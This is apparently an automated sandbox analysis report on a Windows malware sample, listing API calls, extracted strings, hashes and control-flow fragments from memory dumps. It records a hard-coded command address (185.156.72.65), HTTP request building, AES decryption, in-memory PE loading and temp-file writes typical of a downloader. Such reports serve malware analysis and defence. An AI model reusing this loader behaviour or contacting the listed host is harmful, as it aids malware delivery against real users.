                      • API ID: Sleep$CriticalInit_thread_footerSectionTimeUninitialize$CloseCreateEnterFileLeaveOpenSystemUnothrow_t@std@@@Value__ehfuncinfo$??2@
                      • String ID: 185.156.72.65$185.156.72.65$185.156.72.65$@BAO$SUB=$get$mixone$updateSW$u%
                      • API String ID: 606935701-1501174972
                      • Opcode ID: 33f59ebd4ed12ef44d3d881ceef11d19fae5b435b75ea3b5b89dac7f8ecb6f99
                      • Instruction ID: 5b15cd53af07887682d130406d81e99ec93c25d434b47868d83c22c89ba1756f
                      • Opcode Fuzzy Hash: 33f59ebd4ed12ef44d3d881ceef11d19fae5b435b75ea3b5b89dac7f8ecb6f99
                      • Instruction Fuzzy Hash: BBD20271D001149BDB18EB24CD49BAEBB75AF01304F5441BEE8097B2D2DB78AE85CF99

                      Control-flow Graph

                      APIs
                      • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 0479848C
                      • Module32First.KERNEL32(00000000,00000224), ref: 047984AC
                      Memory Dump Source
                      • Source File: 00000000.00000002.4110300371.0000000004790000.00000040.00001000.00020000.00000000.sdmp, Offset: 04790000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4790000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: CreateFirstModule32SnapshotToolhelp32
                      • String ID:
                      • API String ID: 3833638111-0
                      • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                      • Instruction ID: e2566512e86f89ba90c22dec4e3e596ea5bd6550231dc70b7a4f7e6d16353d7c
                      • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                      • Instruction Fuzzy Hash: 25F06236110711ABEB203FF5AC8CA6E76E8AF4A625F110528E642952D0DB74FC4546A2

                      Control-flow Graph

                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Sleep
                      • String ID: mixtwo$nosub
                      • API String ID: 3472027048-187875987
                      • Opcode ID: ab4f70d645e5df1053a7a44eb3d24a53cf0cacacc672b73b3debad2563601ef3
                      • Instruction ID: d051705d2d3a1196041d610bae506d61a1e8aa88cf060e84ab2565e50524cdd9
                      • Opcode Fuzzy Hash: ab4f70d645e5df1053a7a44eb3d24a53cf0cacacc672b73b3debad2563601ef3
                      • Instruction Fuzzy Hash: AAD05286F0420822C00031BE2E0FA1C3A18064262EFA0122AE820226C3B8882A2489EF

                      Control-flow Graph

                      APIs
                      • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 004018A3
                      • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 004018C9
                      • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 004018EF
                        • Part of subcall function 004024A0: Concurrency::cancel_current_task.LIBCPMT ref: 004025C9
                      • HttpAddRequestHeadersA.WININET(?,00000000,00000000,20000000), ref: 00401915
                      Strings
                      • Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0, xrefs: 004018F3
                      • GET, xrefs: 004020E7
                      • Accept-Language: ru-RU,ru;q=0.9,en;q=0.8, xrefs: 004018A7
                      • Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1, xrefs: 004018CD
                      • text, xrefs: 00401B8F
                      • Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1, xrefs: 00401862
                      • http://, xrefs: 00401EF4, 004021D3
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: HeadersHttpRequest$Concurrency::cancel_current_task
                      • String ID: Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1$Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0$Accept-Language: ru-RU,ru;q=0.9,en;q=0.8$Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1$GET$http://$text
                      • API String ID: 2146599340-4172842843
                      • Opcode ID: 422d38bf1008db8560859125de3d0501a6bdee6f1042d5366f80bf11e058982a
                      • Instruction ID: 7e6d5c8cd7aa1cabae0cdc9af9d1d54ef5f059dc9231cd92a953cd594aab5962
                      • Opcode Fuzzy Hash: 422d38bf1008db8560859125de3d0501a6bdee6f1042d5366f80bf11e058982a
                      • Instruction Fuzzy Hash: 05314371E00109EBEB14DBA9CC95FEEB7B9EB08714FA0812AE511735D0C7789945CBA4

                      Control-flow Graph

                      APIs
                      • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 0494024D
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: AllocVirtual
                      • String ID: cess$kernel32.dll
                      • API String ID: 4275171209-1230238691
                      • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                      • Instruction ID: ddbb7b09f19d5ec3bf19675422a8a6ba8997af91244f1046b3b4109762b90cf0
                      • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                      • Instruction Fuzzy Hash: B4527A74A01229DFDB64CF58C984BACBBB5BF49304F1480E9E54DAB351DB30AA85DF14

                      Control-flow Graph

                      APIs
                        • Part of subcall function 00410822: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,00405A9F,00000000,79D989F6), ref: 00410837
                        • Part of subcall function 00410822: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00410856
                      • Sleep.KERNEL32(000003E8), ref: 00405AB0
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Time$FileSleepSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                      • String ID: 185.156.72.65$185.156.72.65$SUB=$get$u%
                      • API String ID: 2563648476-311857291
                      • Opcode ID: 664b2517046e8848212832c9034c49cb43a53afe8dead0a995ac38afe4edbc90
                      • Instruction ID: 73809eb16a5d3869ae15fb7337a890a5b139b8f1a0f0395b135ebc5315de088a
                      • Opcode Fuzzy Hash: 664b2517046e8848212832c9034c49cb43a53afe8dead0a995ac38afe4edbc90
                      • Instruction Fuzzy Hash: 03326571D001189ACB19FB76C95AAEE73785F14308F10817FF846771D2EE7C6A48CAA9

                      Control-flow Graph

                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID:
                      • String ID: http://
                      • API String ID: 0-1121587658
                      • Opcode ID: 62fa76301f8a52dd516a2f10eda550d712df552a2e5fa503cadb94ab45312fa8
                      • Instruction ID: 283a115399ec50033446259c01340d37f537f7c1e1c45d518ea9d7f2bb9a556a
                      • Opcode Fuzzy Hash: 62fa76301f8a52dd516a2f10eda550d712df552a2e5fa503cadb94ab45312fa8
                      • Instruction Fuzzy Hash: 11519071E002099FDF14CFA9C985BEEB7B9EB08304F10812EE915B76C1D7796944CB94

                      Control-flow Graph

                      APIs
                      • RtlAllocateHeap.NTDLL(00000000,?,5(@,?,0040AD5B,?,5(@,185.156.72.65,?,?,004035B7,?,?,5(@), ref: 00413CEB
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: AllocateHeap
                      • String ID: 5(@
                      • API String ID: 1279760036-4133491027
                      • Opcode ID: 0317c977ae3de03b4a355117f1d18651feb64bc701aa808cd4791dde922aff94
                      • Instruction ID: 6b8e07f77369cee0563c76895a616f9db891ca7c172fe53b45855655e8c042ba
                      • Opcode Fuzzy Hash: 0317c977ae3de03b4a355117f1d18651feb64bc701aa808cd4791dde922aff94
                      • Instruction Fuzzy Hash: 10E0E5322002115BD6213F669C05BDB7A5C9B417A2F140137FC56F62D0EA6DCDC241ED

                      Control-flow Graph

                      control_flow_graph 1318 5f8038-5f8046 1319 5f7fc9-5f7fdc 1318->1319 1320 5f8048 1318->1320 1321 5f896e-5fd25e 1319->1321 1320->1321 1327 5fd287-5fd2a2 RegOpenKeyA 1321->1327 1328 5fd260-5fd27b RegOpenKeyA 1321->1328 1330 5fd2ba-5fd32a 1327->1330 1331 5fd2a4-5fd2ae 1327->1331 1328->1327 1329 5fd27d 1328->1329 1329->1327 1335 5fd33d 1330->1335 1336 5fd330-5fd337 1330->1336 1331->1330 1335->1335 1336->1335
                      APIs
                      • RegOpenKeyA.ADVAPI32(80000001,?,?,?,56168394), ref: 005FD273
                      • RegOpenKeyA.ADVAPI32(80000002,?,?,?,56168394), ref: 005FD29A
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108755842.00000000005F6000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F6000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_5f6000_file.jbxd
                      Similarity
                      • API ID: Open
                      • String ID:
                      • API String ID: 71445658-0
                      • Opcode ID: 80307973130d41a80046e1f2bd0dae78c5c6cafd3740d80b3c38f255badbf094
                      • Instruction ID: 48fbc9dc994a6babf73538509380d856d625f0132013bb611eb12667619b224c
                      • Opcode Fuzzy Hash: 80307973130d41a80046e1f2bd0dae78c5c6cafd3740d80b3c38f255badbf094
                      • Instruction Fuzzy Hash: A041BCB100C64E9FEB12DF24C848BEE7FB1FF05314F19052AEA8086942D6354CA5CB9A

                      Control-flow Graph

                      control_flow_graph 1337 5f8968-5fd25e 1344 5fd287-5fd2a2 RegOpenKeyA 1337->1344 1345 5fd260-5fd27b RegOpenKeyA 1337->1345 1347 5fd2ba-5fd32a 1344->1347 1348 5fd2a4-5fd2ae 1344->1348 1345->1344 1346 5fd27d 1345->1346 1346->1344 1352 5fd33d 1347->1352 1353 5fd330-5fd337 1347->1353 1348->1347 1352->1352 1353->1352
                      APIs
                      • RegOpenKeyA.ADVAPI32(80000001,?,?,?,56168394), ref: 005FD273
                      • RegOpenKeyA.ADVAPI32(80000002,?,?,?,56168394), ref: 005FD29A
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108755842.00000000005F6000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F6000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_5f6000_file.jbxd
                      Similarity
                      • API ID: Open
                      • String ID:
                      • API String ID: 71445658-0
                      • Opcode ID: 481e607dad6f910b6bd2e966dbd970ef5cbab0f3d9c9a4b0a50b6f14ce8bc573
                      • Instruction ID: 7904bc8ab372ade3de7c033c14e48868bcfcec26ddfe4398809409b50504660f
                      • Opcode Fuzzy Hash: 481e607dad6f910b6bd2e966dbd970ef5cbab0f3d9c9a4b0a50b6f14ce8bc573
                      • Instruction Fuzzy Hash: E0419DB100C64E9FEB12DF14C848BEE7FB5EF45310F15052AEA8086941D7394CA5DB9A

                      Control-flow Graph

                      control_flow_graph 1354 5f907e-5fd25e 1360 5fd287-5fd2a2 RegOpenKeyA 1354->1360 1361 5fd260-5fd27b RegOpenKeyA 1354->1361 1363 5fd2ba-5fd32a 1360->1363 1364 5fd2a4-5fd2ae 1360->1364 1361->1360 1362 5fd27d 1361->1362 1362->1360 1368 5fd33d 1363->1368 1369 5fd330-5fd337 1363->1369 1364->1363 1368->1368 1369->1368
                      APIs
                      • RegOpenKeyA.ADVAPI32(80000001,?,?,?,56168394), ref: 005FD273
                      • RegOpenKeyA.ADVAPI32(80000002,?,?,?,56168394), ref: 005FD29A
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108755842.00000000005F6000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F6000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_5f6000_file.jbxd
                      Similarity
                      • API ID: Open
                      • String ID:
                      • API String ID: 71445658-0
                      • Opcode ID: 0487bd14be10b5ebd1fc9c1aa4db36e33269615a8f0080f1fa83cc38ce7634ac
                      • Instruction ID: b7b363cfb03acb5e6bbd71967464bcd2fe73b69cf164a7b2aeec89086ea859e1
                      • Opcode Fuzzy Hash: 0487bd14be10b5ebd1fc9c1aa4db36e33269615a8f0080f1fa83cc38ce7634ac
                      • Instruction Fuzzy Hash: 3F31AEB101864E9FEB12DF10C848BEE7FB2FF05310F15056AEA8086942D7394CA5CF99

                      Control-flow Graph

                      control_flow_graph 1370 5f96fe-5fd25e 1375 5fd287-5fd2a2 RegOpenKeyA 1370->1375 1376 5fd260-5fd27b RegOpenKeyA 1370->1376 1378 5fd2ba-5fd32a 1375->1378 1379 5fd2a4-5fd2ae 1375->1379 1376->1375 1377 5fd27d 1376->1377 1377->1375 1383 5fd33d 1378->1383 1384 5fd330-5fd337 1378->1384 1379->1378 1383->1383 1384->1383
                      APIs
                      • RegOpenKeyA.ADVAPI32(80000001,?,?,?,56168394), ref: 005FD273
                      • RegOpenKeyA.ADVAPI32(80000002,?,?,?,56168394), ref: 005FD29A
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108755842.00000000005F6000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F6000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_5f6000_file.jbxd
                      Similarity
                      • API ID: Open
                      • String ID:
                      • API String ID: 71445658-0
                      • Opcode ID: 1e00a574bd770175c78ffcd661cecf7e28f2e5479c8b790c99a60d5079ccc26a
                      • Instruction ID: 27f28b31e370b61afee47f190c2739beb899321996b50ea6b751c2cd1ee8a634
                      • Opcode Fuzzy Hash: 1e00a574bd770175c78ffcd661cecf7e28f2e5479c8b790c99a60d5079ccc26a
                      • Instruction Fuzzy Hash: 7C31C1B100824E9FEB12DF10C8487EE7FB2EF05310F15016AEA8086941D7354CA5CF99

                      Control-flow Graph

                      control_flow_graph 1398 4940e0f-4940e24 SetErrorMode * 2 1399 4940e26 1398->1399 1400 4940e2b-4940e2c 1398->1400 1399->1400
                      APIs
                      • SetErrorMode.KERNEL32(00000400,?,?,04940223,?,?), ref: 04940E19
                      • SetErrorMode.KERNEL32(00000000,?,?,04940223,?,?), ref: 04940E1E
                      Memory Dump Source
                      • Source File: 00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ErrorMode
                      • String ID:
                      • API String ID: 2340568224-0
                      • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                      • Instruction ID: 98d9a3b77034ec0415020b3f8d752fb2f2c3dff89f97121a55313444d61b48f8
                      • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                      • Instruction Fuzzy Hash: 4FD0123114512877D7002A94DC0DBCE7B1CDF05B62F008021FB0DD9080C770964046E5

                      Control-flow Graph

                      control_flow_graph 1410 5f96bd-5f96d3 LoadLibraryA 1411 5fb40a-5fb416 1410->1411
                      APIs
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108755842.00000000005F6000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F6000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_5f6000_file.jbxd
                      Similarity
                      • API ID: LibraryLoad
                      • String ID:
                      • API String ID: 1029625771-0
                      • Opcode ID: b22f91a167eafc61fe6f14e174f9856a1d337fb17b57a749ff7498772b8f89e4
                      • Instruction ID: e78a740e74b7050d33c0d4e577365d907186ea1433240c183cb63f25a21318da
                      • Opcode Fuzzy Hash: b22f91a167eafc61fe6f14e174f9856a1d337fb17b57a749ff7498772b8f89e4
                      • Instruction Fuzzy Hash: B7D0C9F540C608DBD704AF58D808A3ABAE9AB18300F010E1CBFC583350E63918609B5B

                      Control-flow Graph

                      control_flow_graph 1412 4798123-479815d call 4798436 1415 47981ab 1412->1415 1416 479815f-4798192 VirtualAlloc call 47981b0 1412->1416 1415->1415 1418 4798197-47981a9 1416->1418 1418->1415
                      APIs
                      • VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 04798174
                      Memory Dump Source
                      • Source File: 00000000.00000002.4110300371.0000000004790000.00000040.00001000.00020000.00000000.sdmp, Offset: 04790000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4790000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: AllocVirtual
                      • String ID:
                      • API String ID: 4275171209-0
                      • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                      • Instruction ID: 3a8a135cfd3c209053a50b5584947d4b1d8406fe23487f1b01be3a0bf574a5ba
                      • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                      • Instruction Fuzzy Hash: AF113C79A40208EFDB01DF98C985E98BBF5AF08350F058094F9489B361D371EA90DF81
                      APIs
                      • GetTempPathA.KERNEL32(00000104,?,0042C014,0041F068,00000000), ref: 04944011
                      • Sleep.KERNEL32(000003E8), ref: 049441A9
                      • __Init_thread_footer.LIBCMT ref: 0494477E
                      • __Init_thread_footer.LIBCMT ref: 04944944
                      • SHGetFolderPathA.SHELL32(00000000,00000000,00000000,00000000,?,00000000,?,04946D28,0041D835,0042D9B8,0042D9B9,?,00000000,00000000,0042DB70,0042DB71), ref: 04944B4E
                      • __Init_thread_footer.LIBCMT ref: 04944BDC
                      • __Init_thread_footer.LIBCMT ref: 04944E45
                      • CoInitialize.OLE32(00000000), ref: 04944EC6
                      • CoCreateInstance.COMBASE(0041F290,00000000,00000001,0041F260,?), ref: 04944EE1
                      • __Init_thread_footer.LIBCMT ref: 04945344
                      • Sleep.KERNEL32(00000BB8,00000000,?,04946D08,0041D8D0,0042DBDC,0042DBDD), ref: 0494555C
                      • __Init_thread_footer.LIBCMT ref: 04945652
                      • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,?,00000104,?,04946D28,0041D835,0042D9B8,0042D9B9,?,00000000,00000000,0042DB70,0042DB71), ref: 04944F4F
                        • Part of subcall function 04950A89: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,04945D06,00000000,0042C014), ref: 04950A9E
                        • Part of subcall function 04950A89: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04950ABD
                      • __Init_thread_footer.LIBCMT ref: 049442AD
                        • Part of subcall function 04949EE2: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04949EEC
                        • Part of subcall function 04949EE2: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04949F1F
                        • Part of subcall function 04942487: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000080,00000000), ref: 049424BD
                        • Part of subcall function 04942487: WriteFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 049424DE
                        • Part of subcall function 04942487: CloseHandle.KERNEL32(00000000), ref: 049424E5
                      • __Init_thread_footer.LIBCMT ref: 04944489
                        • Part of subcall function 04949F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04949F37
                        • Part of subcall function 04949F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04949F74
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Init_thread_footer$CriticalSection$File$CreateEnterLeavePathSleepTime$ByteCharCloseFolderHandleInitializeInstanceMultiSystemTempUnothrow_t@std@@@WideWrite__ehfuncinfo$??2@
                      • String ID: 185.156.72.65$O@K\$Y@BA$ZK\.$rmBK
                      • API String ID: 529012138-2214808123
                      • Opcode ID: 80f03fce48ad90c555d326397e9bffadaef10e10c65fa4ab2e04da8cea0e0d82
                      • Instruction ID: c7159e2a2b0f1289da68588af35ef38dd43b4696ebd16d85f09c813e05ee9f51
                      • Opcode Fuzzy Hash: 80f03fce48ad90c555d326397e9bffadaef10e10c65fa4ab2e04da8cea0e0d82
                      • Instruction Fuzzy Hash: ADF2E2B0D042589FEB24CF24CC48BADBBB4AF85308F5442E8E5096B291DB75BAC5CF55
                      APIs
                      • SetLastError.KERNEL32(0000000D), ref: 00402F02
                      • SetLastError.KERNEL32(000000C1), ref: 00402F44
                      Strings
                      • Signature != IMAGE_NT_SIGNATURE!, xrefs: 00402FA1
                      • alignedImageSize != AlignValueUp!, xrefs: 0040302C
                      • Size is not valid!, xrefs: 00402F08
                      • Section alignment invalid!, xrefs: 00402FC7
                      • DOS header is not valid!, xrefs: 00402F32
                      • ERROR_OUTOFMEMORY!, xrefs: 00403062
                      • DOS header size is not valid!, xrefs: 00402F71
                      • FileHeader.Machine != HOST_MACHINE!, xrefs: 00402FB3
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: ErrorLast
                      • String ID: DOS header is not valid!$DOS header size is not valid!$ERROR_OUTOFMEMORY!$FileHeader.Machine != HOST_MACHINE!$Section alignment invalid!$Signature != IMAGE_NT_SIGNATURE!$Size is not valid!$alignedImageSize != AlignValueUp!
                      • API String ID: 1452528299-2436911586
                      • Opcode ID: 969231b7725f6e648ae7b53270e343726ac677e9ab86d7066b7749be6261437e
                      • Instruction ID: feefb59cb084f329bf9f2ee3fcaf904be4f7c95626e3fbc9d9f9d2488596d2a7
                      • Opcode Fuzzy Hash: 969231b7725f6e648ae7b53270e343726ac677e9ab86d7066b7749be6261437e
                      • Instruction Fuzzy Hash: C3F1AC71B00205ABCB10CF69D985BAAB7B4BF48705F14407AE909EB6C1D779ED11CB98
                      APIs
                      • CryptAcquireContextW.ADVAPI32(?,00000000,?,00000018,F0000000,79D989F6), ref: 00403650
                      • CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 00403674
                      • CryptHashData.ADVAPI32(?,00000000,?,00000000), ref: 004036DE
                      • GetLastError.KERNEL32 ref: 004036E8
                      • CryptDeriveKey.ADVAPI32(?,0000660E,?,00000000,?), ref: 00403710
                      • GetLastError.KERNEL32 ref: 0040371A
                      • CryptReleaseContext.ADVAPI32(?,00000000), ref: 0040372A
                      • CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,?,00000000), ref: 004037EC
                      • CryptDestroyKey.ADVAPI32(?), ref: 0040385E
                      Strings
                      • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 0040362C
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Crypt$ContextErrorHashLast$AcquireCreateDataDecryptDeriveDestroyRelease
                      • String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
                      • API String ID: 3761881897-63410773
                      • Opcode ID: d367fb143b6554c856abbd5ed66d5e96836dac5444f5810d3b21dde5d4a3622d
                      • Instruction ID: 2781db946ec69ebb5a82e2500c6cd73aae13b8bfd69ebbb4ddbc14150c00f762
                      • Opcode Fuzzy Hash: d367fb143b6554c856abbd5ed66d5e96836dac5444f5810d3b21dde5d4a3622d
                      • Instruction Fuzzy Hash: DF819F71A00218AFEF209F25CC45B9ABBB9FF49300F1481BAF50DA7291DB359E858F55
                      APIs
                      • CryptAcquireContextW.ADVAPI32(?,00000000,?,00000018,F0000000,0042C014), ref: 049438B7
                      • CryptCreateHash.ADVAPI32(?,0000800C,00000000,00000000,?), ref: 049438DB
                      • CryptHashData.ADVAPI32(?,00000000,?,00000000), ref: 04943945
                      • GetLastError.KERNEL32 ref: 0494394F
                      • CryptDeriveKey.ADVAPI32(?,0000660E,?,00000000,?), ref: 04943977
                      • GetLastError.KERNEL32 ref: 04943981
                      • CryptReleaseContext.ADVAPI32(?,00000000), ref: 04943991
                      • CryptDecrypt.ADVAPI32(?,00000000,00000000,00000000,?,00000000), ref: 04943A53
                      • CryptDestroyKey.ADVAPI32(?), ref: 04943AC5
                      Strings
                      • Microsoft Enhanced RSA and AES Cryptographic Provider, xrefs: 04943893
                      Memory Dump Source
                      • Source File: 00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Crypt$ContextErrorHashLast$AcquireCreateDataDecryptDeriveDestroyRelease
                      • String ID: Microsoft Enhanced RSA and AES Cryptographic Provider
                      • API String ID: 3761881897-63410773
                      • Opcode ID: 6e6210ff55f32b3241f3b0da8e138babaf92a1c0b82018977fa48d91ab2d5297
                      • Instruction ID: e28709bbd0167317d677ed61e52becdf7b2194bc70acfa8282d58d6545c7aa2a
                      • Opcode Fuzzy Hash: 6e6210ff55f32b3241f3b0da8e138babaf92a1c0b82018977fa48d91ab2d5297
                      • Instruction Fuzzy Hash: E6814071B002189FEF249F24CC45F9ABBB5EF89300F1481B9E94DA7291DB31AA858F55
                      APIs
                      • VirtualProtect.KERNEL32(?,?,?,?), ref: 00402AF8
                      • GetLastError.KERNEL32(00000400,?,00000000,00000000,?,?,?,?), ref: 00402B0D
                      • FormatMessageA.KERNEL32(00001300,00000000,00000000,?,?,?,?), ref: 00402B1B
                      • LocalAlloc.KERNEL32(00000040,?,?,?,?,?), ref: 00402B36
                      • OutputDebugStringA.KERNEL32(00000000,?,?), ref: 00402B55
                      • LocalFree.KERNEL32(00000000), ref: 00402B62
                      • LocalFree.KERNEL32(?), ref: 00402B67
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4108682490.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Local$Free$AllocDebugErrorFormatLastMessageOutputProtectStringVirtual
                      • String ID: %s: %s$Error protecting memory page
                      • API String ID: 839691724-1484484497
                      • Opcode ID: 9750dd737f677cfe2bf35afdb918f3e7736876f76d8ddec4ee516f8fc37c3b4c
                      • Instruction ID: 7115b4f99f47229cfead79ad45df677009e1c347b6b4b41756aa32ea0cb5f428
                      • Opcode Fuzzy Hash: 9750dd737f677cfe2bf35afdb918f3e7736876f76d8ddec4ee516f8fc37c3b4c
                      • Instruction Fuzzy Hash: A0311431B00104AFDB10DF58DD45FAAB7A8EF48704F4541BAE905EB2D2DB79AD06CB98
                      APIs
                        • Part of subcall function 04950A89: GetSystemTimeAsFileTime.KERNEL32(?,?,?,?,?,?,04945D06,00000000,0042C014), ref: 04950A9E
                        • Part of subcall function 04950A89: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 04950ABD
                        • Part of subcall function 04949F2C: RtlEnterCriticalSection.NTDLL(0042D064), ref: 04949F37
                        • Part of subcall function 04949F2C: RtlLeaveCriticalSection.NTDLL(0042D064), ref: 04949F74
                      • __Init_thread_footer.LIBCMT ref: 04945344
                      • Sleep.KERNEL32(00000BB8,00000000,?,04946D08,0041D8D0,0042DBDC,0042DBDD), ref: 0494555C
                      • __Init_thread_footer.LIBCMT ref: 04945652
                      • Sleep.KERNEL32(000007D0), ref: 049459BC
                      • Sleep.KERNEL32(000007D0), ref: 049459D6
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.4110382379.0000000004940000.00000040.00001000.00020000.00000000.sdmp, Offset: 04940000, based on PE: false
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_4940000_file.jbxd
                      Yara matches
                      Similarity
                      • API ID: Sleep$CriticalInit_thread_footerSectionTime$EnterFileLeaveSystemUnothrow_t@std@@@__ehfuncinfo$??2@
                      • String ID: @BAO$updateSW
                      • API String ID: 3554146954-956047173
                      • Opcode ID: 459a83f2fd3c5c07858fe4c4e2d786a264afa78a17bbb4541cda9f244f9323ee
                      • Instruction ID: d3efd1138fe657fe5c3fdb2a7824117cb0b434d4ee3e7aa1a8d0e1e9d57ea948
                      • Opcode Fuzzy Hash: 459a83f2fd3c5c07858fe4c4e2d786a264afa78a17bbb4541cda9f244f9323ee
